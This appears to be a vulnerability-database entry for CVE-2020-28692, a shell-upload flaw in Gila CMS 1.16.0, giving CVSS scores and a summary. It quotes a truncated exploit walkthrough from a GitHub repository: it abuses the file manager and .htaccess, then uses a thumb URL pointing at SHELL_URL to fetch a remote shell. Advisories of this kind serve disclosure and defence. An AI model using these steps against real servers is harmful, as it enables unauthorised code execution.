578
VMScore

CVE-2020-28692

Published: 16/11/2020 Updated: 30/11/2020
CVSS v2 Base Score: 6.5 | Impact Score: 6.4 | Exploitability Score: 8
CVSS v3 Base Score: 7.2 | Impact Score: 5.9 | Exploitability Score: 1.2
VMScore: 578
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P

Vulnerability Summary

In Gila CMS 1.16.0, an attacker can upload a shell to tmp directy and abuse .htaccess through the logs function for executing PHP files.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

gilacms gila cms 1.16.0

Github Repositories

Gila-CMS-1160-shell-upload (CVE-2020-28692) Author: jkana 1Login as administrator or any users have logs permission 2Access to IP/admin/fm?f=tmp/ For example: 1921680105:1234/gila16/admin/fm?f=tmp/ 3Click +File and create htaccess: 4Use this URL for downloading shell to gila's tmp directory IP/lzld/thumb?size=600&src=SHELL_URL Fo